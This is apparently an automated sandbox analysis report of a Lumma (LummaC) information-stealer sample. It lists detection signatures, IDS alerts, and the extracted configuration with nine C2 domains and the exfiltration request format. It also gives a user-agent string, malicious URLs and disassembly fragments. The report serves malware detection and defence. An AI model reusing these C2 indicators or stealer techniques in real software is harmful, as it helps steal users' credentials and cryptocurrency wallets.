Edit tour

Windows Analysis Report
IzDjbVdHha.exe

Overview

General Information

Sample name:	IzDjbVdHha.exe renamed because original name is a hash value
Original sample name:	b740dd94027c29d447f10e96c3e361ee.exe
Analysis ID:	1581387
MD5:	b740dd94027c29d447f10e96c3e361ee
SHA1:	098994b7e0ea7191bc8c40a0f5a92f0e08920631
SHA256:	b49e5f7e327ad28148d795bffecde8864c77e2f349bac3b199a15de0832c201e
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

IzDjbVdHha.exe (PID: 4344 cmdline: "C:\Users\user\Desktop\IzDjbVdHha.exe" MD5: B740DD94027C29D447F10E96C3E361EE)

WerFault.exe (PID: 6740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1820 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["grannyejh.lat", "sustainskelet.lat", "driblbemris.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2488574681.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2561057689.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1750:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2486208016.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: IzDjbVdHha.exe PID: 4344	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: IzDjbVdHha.exe PID: 4344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: IzDjbVdHha.exe PID: 4344	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:21.860751+0100	2028371	3	Unknown Traffic	192.168.2.6	49731	104.121.10.34	443	TCP
2024-12-27T14:53:24.804707+0100	2028371	3	Unknown Traffic	192.168.2.6	49741	172.67.157.254	443	TCP
2024-12-27T14:53:26.850823+0100	2028371	3	Unknown Traffic	192.168.2.6	49747	172.67.157.254	443	TCP
2024-12-27T14:53:30.177712+0100	2028371	3	Unknown Traffic	192.168.2.6	49754	172.67.157.254	443	TCP
2024-12-27T14:53:33.196821+0100	2028371	3	Unknown Traffic	192.168.2.6	49766	172.67.157.254	443	TCP
2024-12-27T14:53:36.404937+0100	2028371	3	Unknown Traffic	192.168.2.6	49775	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:25.563223+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49741	172.67.157.254	443	TCP
2024-12-27T14:53:27.619073+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49747	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:25.563223+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49741	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:27.619073+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49747	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:18.896295+0100	2058354	1	Domain Observed Used for C2 Detected	192.168.2.6	65480	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:19.359483+0100	2058358	1	Domain Observed Used for C2 Detected	192.168.2.6	58652	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:17.603367+0100	2058360	1	Domain Observed Used for C2 Detected	192.168.2.6	60290	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (driblbemris .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:16.812482+0100	2058486	1	Domain Observed Used for C2 Detected	192.168.2.6	64596	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:18.379044+0100	2058362	1	Domain Observed Used for C2 Detected	192.168.2.6	52984	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:17.380557+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.6	56432	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:17.991744+0100	2058370	1	Domain Observed Used for C2 Detected	192.168.2.6	54193	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:19.674742+0100	2058374	1	Domain Observed Used for C2 Detected	192.168.2.6	61991	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:19.128896+0100	2058376	1	Domain Observed Used for C2 Detected	192.168.2.6	49675	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:31.128542+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49754	172.67.157.254	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T14:53:23.040117+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.6	49731	104.121.10.34	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: IzDjbVdHha.exe

Avira: detected

Antivirus detection for URL or domain

Source: driblbemris.lat	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/Contec&	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/fC62K	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ybh2	Avira URL Cloud: Label: malware
Source: https://help.steampowered.co	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apib	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.IzDjbVdHha.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "sustainskelet.lat", "driblbemris.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: IzDjbVdHha.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: IzDjbVdHha.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: driblbemris.lat
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2278338647.0000000000A30000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_00415799 CryptUnprotectData,

0_2_00415799

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Unpacked PE file: 0.2.IzDjbVdHha.exe.400000.0.unpack

Source: IzDjbVdHha.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49775 version: TLS 1.2

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, esi	0_2_00422190
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00422190
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00422190
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, eax	0_2_00409580
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_00409580
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	0_2_0043C767
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	0_2_0040B70C
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov esi, eax	0_2_00415799
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, eax	0_2_00415799
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp eax	0_2_0042984F
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	0_2_00423860
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov edx, ecx	0_2_00438810
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	0_2_00438810
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	0_2_00438810
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then test eax, eax	0_2_00438810
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041682D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	0_2_0041682D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	0_2_0041682D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0041D83A
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push C0BFD6CCh	0_2_00423086
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push C0BFD6CCh	0_2_00423086
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042B170
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	0_2_004179C1
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	0_2_0043B1D0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, eax	0_2_0043B1D0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, eax	0_2_00405990
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebp, eax	0_2_00405990
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042CA49
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0042DA53
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	0_2_00416263
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	0_2_00415220
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push esi	0_2_00427AD3
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042CAD0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0041B2E0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push ebx	0_2_0043CA93
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041CB40
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_0041CB40
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00428B61
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042CB11
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042CB22
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_0043F330
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, eax	0_2_0040DBD9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, eax	0_2_0040DBD9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	0_2_00417380
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	0_2_0041D380
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00426B95
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00435450
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	0_2_00417380
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push 00000000h	0_2_00429C2B
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_004074F0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_004074F0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	0_2_0043ECA0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	0_2_004385E0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp eax	0_2_004385E0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	0_2_00417DEE
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	0_2_00418591
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	0_2_00428D93
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then xor edi, edi	0_2_0041759F
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	0_2_0041C653
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov edx, ebp	0_2_00425E70
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	0_2_00425E30
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, eax	0_2_0043AEC0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	0_2_00408F50
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00408F50
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042A700
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041BF14
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_00419F30
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	0_2_0041E7C0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx eax, word ptr [edx]	0_2_004197C2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_004197C2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_004197C2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, ebx	0_2_0042DFE9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp ecx	0_2_0040BFFD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	0_2_0043EFB0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov edx, ebp	0_2_00A060D7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	0_2_00A04031
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	0_2_009F8055
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_009FA197
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	0_2_009E91B7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_009E91B7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, eax	0_2_00A1B127
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009FC17B
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then push C0BFD6CCh	0_2_00A032ED
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_009FD230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_009FD230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	0_2_00A1F217
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, ebx	0_2_00A0E250
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp ecx	0_2_009EC264
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, esi	0_2_00A023F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00A023F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00A023F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_00A0B3D7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	0_2_009F5487
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	0_2_009F64CA
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	0_2_00A064DA
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00A09444
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	0_2_00A09444
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00A1F597
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	0_2_009F75E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	0_2_009FD5E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_009FB547
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00A156B7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ecx, eax	0_2_009E97E7
